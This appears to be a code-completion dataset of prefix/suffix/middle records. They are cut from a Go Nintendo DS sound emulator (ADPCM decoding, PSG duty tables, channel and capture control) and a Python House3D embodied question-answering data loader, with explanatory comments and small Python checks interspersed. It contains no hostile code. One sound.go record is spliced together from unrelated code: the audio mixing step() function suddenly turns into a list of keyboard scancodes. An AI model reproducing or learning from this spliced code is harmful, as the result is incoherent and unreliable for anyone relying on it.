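The psgTable rows in the record above are 16-byte little-endian int16 sample pairs encoding the eight PSG duty cycles, as the trailing waveform comments suggest. The short Python check below rebuilds a row from its duty value so the byte layout can be verified by eye; the function name and the duty argument exist only for this illustration.

import struct

def psg_row(duty):
    # duty 0..6: (7-duty) low samples then (duty+1) high samples; duty 7: all low,
    # matching the "_______-" ... "________" comments next to psgTable.
    low, high = -0x7FFF, 0x7FFF
    samples = [low] * 8 if duty == 7 else [low] * (7 - duty) + [high] * (duty + 1)
    return struct.pack("<8h", *samples)

assert psg_row(0) == bytes.fromhex("0180" * 7 + "ff7f")   # first row of psgTable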
sound.go
|
snd.capture[0].regdad = &snd.SndCap0Dad.Value
snd.capture[1].regdad = &snd.SndCap1Dad.Value
snd.capture[0].reglen = &snd.SndCap0Len.Value
snd.capture[1].reglen = &snd.SndCap1Len.Value
hwio.MustInitRegs(snd)
return snd
}
func (ch *HwSoundChannel) WriteSNDCNT(old, new uint32) {
if (old^new)&(1<<31) != 0 {
if new&(1<<31) != 0 {
ch.snd.startChannel(ch.idx)
} else {
ch.snd.stopChannel(ch.idx)
}
}
}
func (ch *HwSoundChannel) WriteSNDTMR(_, new uint16) {
// A write to SNDTMR also takes effect while the voice is playing
// so copy the value into the latched register we increment at every tick.
ch.snd.voice[ch.idx].tmr = uint32(new)
}
func (snd *HwSound) startChannel(idx int) {
ch := &snd.Ch[idx]
v := &snd.voice[idx]
ptr := snd.Bus.FetchPointer(ch.SndSad.Value)
mode := int((ch.SndCnt.Value >> 29) & 3)
length := uint32(ch.SndPnt.Value)*4 + ch.SndLen.Value*4
loop := int((ch.SndCnt.Value >> 27) & 3)
if ch.SndCnt.Value&(1<<15) != 0 {
panic("hold")
}
v.on = false // will put true at the end of the function, if no error
v.mem = ptr[:length]
v.pos = 0
v.delay = 3
v.tmr = uint32(ch.SndTmr.Value)
v.mode = mode
v.loop = loop
var sum uint64
switch v.mode {
case kModeAdpcm:
v.delay = 11
sum = crc64.Checksum(v.mem, ctable)
if buf, found := snd.cache.Get(sum); found {
v.mem = buf.([]byte)
} else {
v.mem = snd.adpcmDecompress(v.mem)
// go ioutil.WriteFile(fmt.Sprintf("%x.raw", sum), v.mem, 0666)
snd.cache.Add(sum, v.mem)
}
case kModePsgNoise:
v.delay = 1
if idx >= 8 && idx <= 13 {
// Mode PSG
v.mem = psgTable[(ch.SndCnt.Value>>24)&3][:]
} else {
log.ModSound.WithField("ch", idx).Error("unsupported PSG/noise mode on this channel")
return
}
}
if ch.SndCnt.Value&(1<<15) != 0 {
panic("hold value")
}
log.ModSound.InfoZ("start channel").
Int("ch", idx).
Int("mode", mode).
Hex32("rpos", ch.SndSad.Value).
Uint32("len", length).
Uint("ptlen", uint(ch.SndPnt.Value)*4).
Hex64("sum", sum).
Int("loop", loop).
Hex16("tmr", ch.SndTmr.Value).
Int64("clk", nds7.Cycles()).
End()
v.on = true
}
func (snd *HwSound) stopChannel(idx int) {
v := &snd.voice[idx]
v.on = false
snd.Ch[idx].SndCnt.Value &^= 1 << 31
log.ModSound.InfoZ("stop channel").Int("idx", idx).End()
}
func (snd *HwSound) loopChannel(idx int) uint {
if snd.voice[idx].loop == kLoopInfinite {
off := snd.Ch[idx].SndPnt.Value * 4
switch snd.voice[idx].mode {
case kModeAdpcm:
off -= 4
fallthrough
case kMode16bit:
off /= 2
}
return uint(off)
}
return kPosNoLoop
}
func (snd *HwSound) WriteSNDCAP0CNT(old, new uint8) { snd.writeSNDCAPCNT(0, old, new) }
func (snd *HwSound) WriteSNDCAP1CNT(old, new uint8) { snd.writeSNDCAPCNT(1, old, new) }
func (snd *HwSound) writeSNDCAPCNT(idx int, old, new uint8) {
if (old^new)&(1<<7) != 0 {
if new&(1<<7) != 0 {
snd.startCapture(idx, new)
} else {
snd.stopCapture(idx, new)
}
}
}
func (snd *HwSound) startCapture(idx int, cnt uint8) {
cap := &snd.capture[idx]
cap.on = true
cap.loop = cnt&(1<<2) == 0
cap.bit8 = cnt&(1<<3) != 0
cap.single = cnt&(1<<1) != 0
cap.add = cnt&(1<<1) != 0
cap.wpos = *cap.regdad
cap.reset = uint32(snd.Ch[idx*2+1].SndTmr.Value)
cap.tmr = cap.reset
log.ModSound.InfoZ("start capture").
Int("idx", idx).
Bool("loop", cap.loop).
Bool("8bit", cap.bit8).
Bool("single", cap.single).
Bool("add", cap.add).
Hex32("wpos", cap.wpos).
Hex32("wlen", *cap.reglen*4).
Hex16("tmr", uint16(cap.reset)).
Int64("clk", nds7.Cycles()).
End()
}
func (snd *HwSound) stopCapture(idx int, cnt uint8) {
cap := &snd.capture[idx]
cap.on = false
}
var (
voldiv = [4]uint32{0, 1, 2, 4}
adpcmIndexTable = [8]int16{-1, -1, -1, -1, 2, 4, 6, 8}
adpcmTable = [89]uint16{
0x0007, 0x0008, 0x0009, 0x000A, 0x000B, 0x000C, 0x000D, 0x000E, 0x0010, 0x0011, 0x0013, 0x0015,
0x0017, 0x0019, 0x001C, 0x001F, 0x0022, 0x0025, 0x0029, 0x002D, 0x0032, 0x0037, 0x003C, 0x0042,
0x0049, 0x0050, 0x0058, 0x0061, 0x006B, 0x0076, 0x0082, 0x008F, 0x009D, 0x00AD, 0x00BE, 0x00D1,
0x00E6, 0x00FD, 0x0117, 0x0133, 0x0151, 0x0173, 0x0198, 0x01C1, 0x01EE, 0x0220, 0x0256, 0x0292,
0x02D4, 0x031C, 0x036C, 0x03C3, 0x0424, 0x048E, 0x0502, 0x0583, 0x0610, 0x06AB, 0x0756, 0x0812,
0x08E0, 0x09C3, 0x0ABD, 0x0BD0, 0x0CFF, 0x0E4C, 0x0FBA, 0x114C, 0x1307, 0x14EE, 0x1706, 0x1954,
0x1BDC
|
{
hwio.MustInitRegs(&snd.Ch[i])
snd.Ch[i].snd = snd
snd.Ch[i].idx = i
}
|
conditional_block
|
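loopChannel in the record above turns SNDPNT into a restart position: SNDPNT counts 32-bit words, ADPCM data drops its 4-byte header when decompressed, and the 16-bit (and decoded ADPCM) buffers are then indexed per sample rather than per byte. A direct Python transcription of that unit conversion, with the function and mode names chosen only for this sketch:

def loop_start(sndpnt_words, mode):
    off = sndpnt_words * 4        # SNDPNT is expressed in 32-bit words -> byte offset
    if mode == "adpcm":
        off -= 4                  # the 4-byte ADPCM header is not part of the decoded buffer
        off //= 2                 # fallthrough in the Go code: ADPCM halves like the 16-bit case
    elif mode == "16bit":
        off //= 2                 # byte offset -> 16-bit sample index
    return off                    # 8-bit / PSG modes keep the byte offset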
|
sound.go
|
0x003C, 0x0042,
0x0049, 0x0050, 0x0058, 0x0061, 0x006B, 0x0076, 0x0082, 0x008F, 0x009D, 0x00AD, 0x00BE, 0x00D1,
0x00E6, 0x00FD, 0x0117, 0x0133, 0x0151, 0x0173, 0x0198, 0x01C1, 0x01EE, 0x0220, 0x0256, 0x0292,
0x02D4, 0x031C, 0x036C, 0x03C3, 0x0424, 0x048E, 0x0502, 0x0583, 0x0610, 0x06AB, 0x0756, 0x0812,
0x08E0, 0x09C3, 0x0ABD, 0x0BD0, 0x0CFF, 0x0E4C, 0x0FBA, 0x114C, 0x1307, 0x14EE, 0x1706, 0x1954,
0x1BDC, 0x1EA5, 0x21B6, 0x2515, 0x28CA, 0x2CDF, 0x315B, 0x364B, 0x3BB9, 0x41B2, 0x4844, 0x4F7E,
0x5771, 0x602F, 0x69CE, 0x7462, 0x7FFF,
}
psgTable = [8][16]uint8{
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f}, // _______-
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f}, // ______--
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // _____---
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // ____----
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // ___-----
{0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // __------
{0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // _-------
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80}, // ________
}
)
func (snd *HwSound) adpcmDecompress(buf []byte) []byte {
// ioutil.WriteFile("sound.adpcm", buf, 0666)
head := binary.LittleEndian.Uint32(buf[:4])
buf = buf[4:]
pcm := int32(int16(head & 0xFFFF))
index := int16(head>>16) & 0x7F
res := make([]byte, 0, len(buf)*4)
dec := func(sample uint8) {
diff := adpcmTable[index] / 8
diff += (adpcmTable[index] / 4) * uint16((sample>>0)&1)
diff += (adpcmTable[index] / 2) * uint16((sample>>1)&1)
diff += (adpcmTable[index] / 1) * uint16((sample>>2)&1)
if sample&8 == 0 {
pcm += int32(diff)
if pcm > 0x7FFF {
pcm = 0x7FFF
}
} else {
pcm -= int32(diff)
if pcm < -0x7FFF {
pcm = -0x7FFF
}
}
index += adpcmIndexTable[sample&7]
if index < 0 {
index = 0
} else if index > 88 {
index = 88
}
}
for i := range buf {
dec(buf[i] & 0xF)
res = append(res, uint8(pcm&0xFF))
res = append(res, uint8((pcm>>8)&0xFF))
dec(buf[i] >> 4)
res = append(res, uint8(pcm&0xFF))
res = append(res, uint8((pcm>>8)&0xFF))
}
return res
}
func (snd *HwSound) RunOneFrame(buf []int16) {
for i := 0; i < len(buf); i += 2 {
l, r := snd.step()
// Extend to 16-bit range
l = l<<6 | l>>4
r = r<<6 | r>>4
buf[i] = int16(l - 0x8000)
buf[i+1] = int16(r - 0x8000)
}
}
func mulvol64(s int64, vol int64) int64 {
if vol == 127 {
return s
}
return (s * vol) >> 7
}
// Emulate one tick of audio, producing a couple of (unsigned) 16-bit audio samples
func (snd *HwSound) step() (uint16, uint16) {
var lmix, rmix int64
var chbuf [4]int64
// Master enable
if snd.SndGCnt.Value&(1<<15) == 0 {
return uint16(snd.SndBias.Value), uint16(snd.SndBias.Value)
}
scans := []int{
hw.SCANCODE_0,
hw.SCANCODE_1,
hw.SCANCODE_2,
|
hw.SCANCODE_3,
hw.SCANCODE_4,
hw.SCANCODE_5,
hw.SCANCODE_6,
|
random_line_split
|
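The dec closure inside adpcmDecompress is a standard IMA-style step: scale the current table entry by the low three bits of the nibble, apply the sign bit, then clamp the sample to +/-0x7FFF and the step index to 0..88. Below is a line-for-line Python transcription of one nibble, convenient for checking the arithmetic by hand; the function name and argument order exist only for this sketch. Since adpcmTable holds unsigned values, the shifts here match the integer divisions in the Go code.

def adpcm_step(nibble, pcm, index, step_table, index_table):
    # diff = step/8 + (step/4)*b0 + (step/2)*b1 + step*b2, exactly as in dec().
    step = step_table[index]
    diff = step >> 3
    if nibble & 1:
        diff += step >> 2
    if nibble & 2:
        diff += step >> 1
    if nibble & 4:
        diff += step
    if nibble & 8:                                    # sign bit: subtract and clamp low
        pcm = max(pcm - diff, -0x7FFF)
    else:                                             # add and clamp high
        pcm = min(pcm + diff, 0x7FFF)
    index = min(max(index + index_table[nibble & 7], 0), 88)
    return pcm, index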
|
sound.go
|
8]int16{-1, -1, -1, -1, 2, 4, 6, 8}
adpcmTable = [89]uint16{
0x0007, 0x0008, 0x0009, 0x000A, 0x000B, 0x000C, 0x000D, 0x000E, 0x0010, 0x0011, 0x0013, 0x0015,
0x0017, 0x0019, 0x001C, 0x001F, 0x0022, 0x0025, 0x0029, 0x002D, 0x0032, 0x0037, 0x003C, 0x0042,
0x0049, 0x0050, 0x0058, 0x0061, 0x006B, 0x0076, 0x0082, 0x008F, 0x009D, 0x00AD, 0x00BE, 0x00D1,
0x00E6, 0x00FD, 0x0117, 0x0133, 0x0151, 0x0173, 0x0198, 0x01C1, 0x01EE, 0x0220, 0x0256, 0x0292,
0x02D4, 0x031C, 0x036C, 0x03C3, 0x0424, 0x048E, 0x0502, 0x0583, 0x0610, 0x06AB, 0x0756, 0x0812,
0x08E0, 0x09C3, 0x0ABD, 0x0BD0, 0x0CFF, 0x0E4C, 0x0FBA, 0x114C, 0x1307, 0x14EE, 0x1706, 0x1954,
0x1BDC, 0x1EA5, 0x21B6, 0x2515, 0x28CA, 0x2CDF, 0x315B, 0x364B, 0x3BB9, 0x41B2, 0x4844, 0x4F7E,
0x5771, 0x602F, 0x69CE, 0x7462, 0x7FFF,
}
psgTable = [8][16]uint8{
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f}, // _______-
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f}, // ______--
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // _____---
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // ____----
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // ___-----
{0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // __------
{0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // _-------
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80}, // ________
}
)
func (snd *HwSound) adpcmDecompress(buf []byte) []byte {
// ioutil.WriteFile("sound.adpcm", buf, 0666)
head := binary.LittleEndian.Uint32(buf[:4])
buf = buf[4:]
pcm := int32(int16(head & 0xFFFF))
index := int16(head>>16) & 0x7F
res := make([]byte, 0, len(buf)*4)
dec := func(sample uint8) {
diff := adpcmTable[index] / 8
diff += (adpcmTable[index] / 4) * uint16((sample>>0)&1)
diff += (adpcmTable[index] / 2) * uint16((sample>>1)&1)
diff += (adpcmTable[index] / 1) * uint16((sample>>2)&1)
if sample&8 == 0 {
pcm += int32(diff)
if pcm > 0x7FFF {
pcm = 0x7FFF
}
} else {
pcm -= int32(diff)
if pcm < -0x7FFF {
pcm = -0x7FFF
}
}
index += adpcmIndexTable[sample&7]
if index < 0 {
index = 0
} else if index > 88 {
index = 88
}
}
for i := range buf {
dec(buf[i] & 0xF)
res = append(res, uint8(pcm&0xFF))
res = append(res, uint8((pcm>>8)&0xFF))
dec(buf[i] >> 4)
res = append(res, uint8(pcm&0xFF))
res = append(res, uint8((pcm>>8)&0xFF))
}
return res
}
func (snd *HwSound) RunOneFrame(buf []int16) {
|
for i := 0; i < len(buf); i += 2 {
l, r := snd.step()
// Extend to 16-bit range
l = l<<6 | l>>4
r = r<<6 | r>>4
buf[i] = int16(l - 0x8000)
buf[i+1] = int16(r - 0x8000)
}
}
|
identifier_body
|
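The l = l<<6 | l>>4 step in RunOneFrame appears to treat the mixer output as a 10-bit unsigned sample (the width of the sound bias register): replicating the top four bits into the low ones stretches 0..0x3FF across 0..0xFFFF, and the following subtraction of 0x8000 recentres it as a signed int16. A quick Python check of that mapping; the helper name is illustrative only.

def extend_10_to_16(l):
    # 10-bit unsigned mixer output -> signed 16-bit sample, as in RunOneFrame.
    assert 0 <= l <= 0x3FF
    u = ((l << 6) | (l >> 4)) & 0xFFFF
    return u - 0x8000

assert extend_10_to_16(0x000) == -32768   # silence maps to the negative rail
assert extend_10_to_16(0x3FF) == 32767    # full scale maps to the positive rail
assert extend_10_to_16(0x200) == 32       # the midpoint lands just above zero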
|
nav_loc_vqa_rl_loader.py
|
start, len(self.all_houses)))
# Load envs
start = time.time()
self.env_loaded = {}
for i in range(len(self.all_houses)):
print('[%02d/%d][split:%s][gpu:%d][house:%s]' %
(i + 1, len(self.all_houses), self.split, self.gpu_id, self.all_houses[i].house['id']))
env = Environment(self.api_threads[i], self.all_houses[i], self.cfg)
self.env_loaded[self.all_houses[i].house['id']] = \
House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded %d house3d envs' % (time.time() - start, len(self.env_loaded)))
for i in range(len(self.all_houses)):
self.visited_envs.add(self.all_houses[i].house['id'])
# Mark available data indices
self.available_idx = [i for i, v in enumerate(self.env_list) if v in self.env_loaded]
print('Available inds: %d' % len(self.available_idx))
def _load_env(self, house):
# For testing (ipynb) only, we want to load just one house.
start = time.time()
self.all_houses = [local_create_house(house, self.cfg, self.map_resolution)]
env = Environment(self.api_threads[0], self.all_houses[0], self.cfg)
self.env_loaded[house] = House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded 1 house3d envs' % (time.time() - start))
def _check_if_all_envs_loaded(self):
print('[CHECK][Visited:%d envs][Total:%d envs]' % (len(self.visited_envs), len(self.env_set)))
return len(self.visited_envs) == len(self.env_set)
def _check_if_all_targets_loaded(self):
print('[CHECK][Visited:%d targets][Total:%d targets]' % (len(self.img_data_cache), len(self.env_list)))
if len(self.img_data_cache) == len(self.env_list):
self.available_idx = [i for i, v in enumerate(self.env_list)]
return True
else:
return False
def set_camera(self, e, pos, robot_height=1.0):
assert len(pos) == 4
e.env.cam.pos.x = pos[0]
e.env.cam.pos.y = robot_height
e.env.cam.pos.z = pos[2]
e.env.cam.yaw = pos[3]
e.env.cam.updateDirection()
def render(self, e):
return e.env.render()
def get_frames(self, e, pos_queue, preprocess=True):
# return imgs (n, 3, 224, 224) along pos_queue
if not isinstance(pos_queue, list):
pos_queue = [pos_queue]
res = []
for i in range(len(pos_queue)):
self.set_camera(e, pos_queue[i])
img = np.array(self.render(e), copy=False, dtype=np.uint8)
if preprocess:
img = img.astype(np.float32) / 255.
img = img.transpose(2, 0, 1) # (3, 224, 224)
res.append(img)
return np.array(res)
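get_frames scales each rendered RGB frame to [0, 1] and reorders it from HWC to CHW before stacking, which is the layout the downstream CNN expects. A one-frame sketch of that preprocessing, with a random array standing in for the renderer output:

import numpy as np

img = np.random.randint(0, 256, (224, 224, 3), dtype=np.uint8)  # stand-in for self.render(e)
img = img.astype(np.float32) / 255.0                             # scale to [0, 1]
img = img.transpose(2, 0, 1)                                     # HWC -> CHW
assert img.shape == (3, 224, 224)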
def __getitem__(self, index):
"""
- idx
- qid, house
- question, answer
- qe, ae
- type
- attr
- path_ix
- nav_ids
- nav_types
- nav_ego_feats #navs of (l, 3200) float32
- nav_action_inputs #navs of (l, ) int64
- nav_action_outputs #navs of (l, ) int64
- nav_ego_imgs #navs of (l, 224, 224, 3) uint8 if necessary
private variables:
- episode_house
- nav_pos_queues #navs of l [x, y, z, yaw]
- path_len
"""
idx = self.available_idx[index]
qn = self.questions[idx]
qid = qn['id']
house = qn['house']
attr, room_attr = self.question_to_attribute(qn)
# encode question and answer
qe = self.encoded_questions[qn['h5_id']]
ae = self.encoded_answers[qn['h5_id']]
# choose path_ix
path_ix = random.choice(range(qn['num_paths'])) if self.split == 'train' else 0
path_feats_h5 = h5py.File(osp.join(self.path_feats_dir, qn['path_name']+'.h5'), 'r')
raw_ego_feats = path_feats_h5['ego_rgb%s' % path_ix][...].reshape(-1, 3200) # (L, 32, 10, 10)
raw_path_len = raw_ego_feats.shape[0]
raw_actions = qn['path_actions'][path_ix] # (L, )
raw_pos_queue = qn['path_positions'][path_ix] # list of L positions
if self.requires_imgs:
path_images_h5 = h5py.File(osp.join(self.path_images_dir, qn['path_name']+'.h5'), 'r')
raw_ego_imgs = path_images_h5['ego_rgb%s' % path_ix] # (L, 224, 224, 3)
nav_ego_imgs = []
# nav_phrases, nav_phrase_embs
nav_pgs = [pg for pg in qn['program'] if 'nav' in pg['function']]
nav_ids = [pg['id'][0] for pg in qn['program'] if 'nav' in pg['function']]
nav_types = [pg['function'][4:] for pg in qn['program'] if 'nav' in pg['function']]
nav_phrases = [pg['value_inputs'][0] for pg in qn['program'] if 'nav' in pg['function']]
nav_phrase_embs = []
for phrase in nav_phrases:
nav_phrase_embs.append(np.array([self.wtov[wd] for wd in phrase.split()]).mean(0).astype(np.float32)) # (300, )
nav_phrase_embs = np.array(nav_phrase_embs) # (#targets, 300)
# For each segment path: feats + actions + pos_queue
raw_key_ixs = qn['key_ixs_set'][path_ix]
nav_ego_feats = []
nav_action_inputs = []
nav_action_outputs = []
nav_pos_queues = []
for i, key_ix in enumerate(raw_key_ixs):
start_ix = 0 if i == 0 else raw_key_ixs[i-1] # we use last key_ix moment as start (spawn location)
end_ix = raw_key_ixs[i]+1
ego_feats = raw_ego_feats[start_ix:end_ix]
action_inputs = np.array([4] + raw_actions[start_ix:end_ix][:-1], dtype=np.int64)
action_outputs = np.array(raw_actions[start_ix:end_ix-1] + [3], dtype=np.int64)
pos_queue = raw_pos_queue[start_ix:end_ix]
assert ego_feats.shape[0] == len(pos_queue) == action_inputs.shape[0]
# add to list
nav_ego_feats.append(ego_feats)
nav_action_inputs.append(action_inputs)
nav_action_outputs.append(action_outputs)
nav_pos_queues.append(pos_queue)
if self.requires_imgs:
nav_ego_imgs.append(raw_ego_imgs[start_ix:end_ix])
# cache
if self.to_cache and index not in self.img_data_cache:
self.img_data_cache[index] = True # TODO: replace with ego_feats
# private variable
self.episode_house = self.env_loaded[house]
self.nav_pos_queues = nav_pos_queues
self.path_len = raw_path_len
# return
data = {}
data['idx'] = idx
data['qid'] = qid
data['house'] = qn['house']
data['question'] = qn['question']
data['answer'] = qn['answer']
data['type'] = qn['type']
data['attr'] = attr
data['qe'] = qe
data['ae'] = ae
data['path_name'] = qn['path_name']
data['path_ix'] = path_ix
data['nav_ids'] = nav_ids
data['nav_types'] = nav_types
data['nav_phrases'] = nav_phrases
data['nav_phrase_embs'] = nav_phrase_embs
data['nav_ego_feats'] = nav_ego_feats
data['nav_action_inputs'] = nav_action_inputs
data['nav_action_outputs'] = nav_action_outputs
if self.requires_imgs:
data['nav_ego_imgs'] = nav_ego_imgs
return data
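Each navigation target gets its own sub-path in the loop above: the slice runs from the previous key index (the spawn location) through the current key index, action inputs are the actions shifted right with the 'dummy' token (4) prepended, and action outputs end with the 'stop' token (3), so inputs and outputs stay aligned per step. A small standalone sketch of that slicing, using made-up actions and key indices purely to show the alignment:

raw_actions = [0, 0, 1, 0, 2, 0]   # hypothetical forward/left/right ids from act_to_ix
raw_key_ixs = [2, 5]               # hypothetical key moments along the path

segments = []
for i, key_ix in enumerate(raw_key_ixs):
    start_ix = 0 if i == 0 else raw_key_ixs[i - 1]            # previous key moment is the spawn point
    end_ix = key_ix + 1
    action_inputs = [4] + raw_actions[start_ix:end_ix][:-1]   # 4 = dummy start token
    action_outputs = raw_actions[start_ix:end_ix - 1] + [3]   # 3 = stop token
    assert len(action_inputs) == len(action_outputs) == end_ix - start_ix
    segments.append((action_inputs, action_outputs))

# segments[0] == ([4, 0, 0], [0, 0, 3]); segments[1] == ([4, 1, 0, 2], [1, 0, 2, 3])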
def
|
spawn_agent
|
identifier_name
|
|
nav_loc_vqa_rl_loader.py
|
gpu_id,
max_threads_per_gpu,
cfg,
to_cache,
target_obj_conn_map_dir,
map_resolution,
pretrained_cnn_path,
requires_imgs=False,
question_types=['all'],
ratio=None,
height=224,
width=224,
num_questions=-1):
print('Loading data.json:', data_json)
self.infos = json.load(open(data_json))
self.wtoi = self.infos['wtoi'] # question vocab
self.atoi = self.infos['atoi'] # answer vocab
self.ctoi = self.infos['ctoi'] # color vocab
self.wtov = self.infos['wtov'] # word2vec
self.itow = {i: w for w, i in self.wtoi.items()}
self.itoa = {i: a for a, i in self.atoi.items()}
self.itoc = {i: c for c, i in self.ctoi.items()}
print('%s question vocab, %s answer vocab, %s color vocab, %s word2vec loaded.' % \
(len(self.wtoi), len(self.atoi), len(self.ctoi), len(self.wtov)))
# questions
if question_types == ['all']:
self.questions = [qn for qn in self.infos['questions'] if qn['split'] == split]
else:
self.questions = [qn for qn in self.infos['questions'] if qn['split'] == split and qn['type'] in question_types]
if num_questions != -1:
self.questions = self.questions[:num_questions]
self.Questions = {qn['id']: qn for qn in self.questions}
self.ids = [qn['id'] for qn in self.questions]
print('%s questions loaded for type %s under split[%s].' % (len(self.questions), question_types, split))
# hid_tid_to_best_iou
self.hid_tid_to_best_iou = self.infos['hid_tid_to_best_iou'] # hid_tid --> best_iou
# load data.h5
encoded = h5py.File(data_h5, 'r')
self.encoded_questions = encoded['encoded_questions']
self.encoded_answers = encoded['encoded_answers']
assert self.encoded_questions.shape[0] == self.encoded_answers.shape[0]
print('max_length of encoded_questions is', self.encoded_questions.shape[1])
print('[%s] data prepared, where there are %s questions.' % (split, len(self.questions)))
# actions
self.actions = ['forward', 'left', 'right', 'dummy']
self.act_to_ix = {'forward': 0, 'left': 1, 'right': 2, 'stop': 3, 'dummy': 4}
self.ix_to_act = {i: a for a, i in self.act_to_ix.items()}
# more info
self.split = split
self.path_feats_dir = path_feats_dir
self.path_images_dir = path_images_dir
self.requires_imgs = requires_imgs
self.pre_size = 5 # hard code it
self.gpu_id = gpu_id
self.cfg = cfg
self.max_threads_per_gpu = max_threads_per_gpu
self.target_obj_conn_map_dir = target_obj_conn_map_dir
self.map_resolution = map_resolution
self.to_cache = to_cache
self.height = height or 224
self.width = width or 224
self.episode_pos_queue = None
self.episode_house = None
self.target_room = None
self.target_obj = None
self.img_data_cache = {} # qid --> feats
self.available_idx = []
self.visited_envs = set()
self.api_threads = []
# set up cnn
cnn_kwargs = {'num_classes': 191, 'pretrained': True, 'checkpoint_path': pretrained_cnn_path}
self.cnn = MultitaskCNN(**cnn_kwargs).cuda()
self.cnn.eval()
print('cnn set up.')
# construct mapping
self.envs = list(set([qn['house'] for qn in self.questions])) # all house_ids
self.env_idx = [self.envs.index(qn['house']) for qn in self.questions] # house index for each question
self.env_list = [self.envs[x] for x in self.env_idx] # list of house_ids for each question
self.env_set = list(set(self.env_list))
self.env_set.sort() # ordered house_ids
if ratio:
assert isinstance(ratio, list), ratio
self.env_set = self.env_set[int(ratio[0]*len(self.env_set)):int(ratio[1]*len(self.env_set))]
print('Total envs: %d' % len(self.envs))
print('Envs in [%s]: %d, we use %d.' % (self.split, len(list(set(self.env_idx))), len(self.env_set)))
# load environments
self._load_envs(start_idx=0, in_order=True)
def _pick_envs_to_load(self, split, max_envs, start_idx, in_order):
"""
pick houses from self.env_set
"""
if split in ['val', 'test'] or in_order:
pruned_env_set = self.env_set[start_idx:start_idx+max_envs] # could be empty if start_idx reaches the end
else:
if max_envs < len(self.env_set):
env_inds = np.random.choice(len(self.env_set), max_envs, replace=False)
else:
env_inds = np.random.choice(len(self.env_set), max_envs, replace=True)
pruned_env_set = [self.env_set[x] for x in env_inds]
return pruned_env_set
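For val/test splits (or when in_order is set) the loader simply walks self.env_set in fixed-size windows, so repeated calls to _load_envs page through the houses max_threads_per_gpu at a time; for training it samples that many houses at random instead. A tiny sketch of the windowed case with a hypothetical env_set:

env_set = ['house_a', 'house_b', 'house_c', 'house_d', 'house_e']   # hypothetical ids
max_envs = 2

windows = [env_set[i:i + max_envs] for i in range(0, len(env_set), max_envs)]
# [['house_a', 'house_b'], ['house_c', 'house_d'], ['house_e']]
# A start index past the end yields an empty window, which is why _load_envs returns early.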
def _load_envs(self, start_idx=-1, in_order=False):
if start_idx == -1: # next env
start_idx = self.env_set.index(self.pruned_env_set[-1]) + 1
# pick envs
self.pruned_env_set = self._pick_envs_to_load(self.split, self.max_threads_per_gpu,
start_idx, in_order)
if len(self.pruned_env_set) == 0:
return
# Load api threads
start = time.time()
if len(self.api_threads) == 0:
for i in range(self.max_threads_per_gpu):
self.api_threads.append(objrender.RenderAPIThread(w=self.width, h=self.height, device=self.gpu_id))
print('[%.2f] Loaded %d api threads' % (time.time()-start, len(self.api_threads)))
# Load houses
start = time.time()
from multiprocessing import Pool
_args = ([h, self.cfg, self.map_resolution] for h in self.pruned_env_set)
with Pool(len(self.pruned_env_set)) as pool:
self.all_houses = pool.starmap(local_create_house, _args)
print('[%.02f] Loaded %d houses' % (time.time() - start, len(self.all_houses)))
# Load envs
start = time.time()
self.env_loaded = {}
for i in range(len(self.all_houses)):
print('[%02d/%d][split:%s][gpu:%d][house:%s]' %
(i + 1, len(self.all_houses), self.split, self.gpu_id, self.all_houses[i].house['id']))
env = Environment(self.api_threads[i], self.all_houses[i], self.cfg)
self.env_loaded[self.all_houses[i].house['id']] = \
House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded %d house3d envs' % (time.time() - start, len(self.env_loaded)))
for i in range(len(self.all_houses)):
self.visited_envs.add(self.all_houses[i].house['id'])
# Mark available data indices
self.available_idx = [i for i, v in enumerate(self.env_list) if v in self.env_loaded]
print('Available inds: %d' % len(self.available_idx))
def _load_env(self, house):
# For testing (ipynb) only, we wanna load just one house.
start = time.time()
self.all_houses = [local_create_house(house, self.cfg, self.map_resolution)]
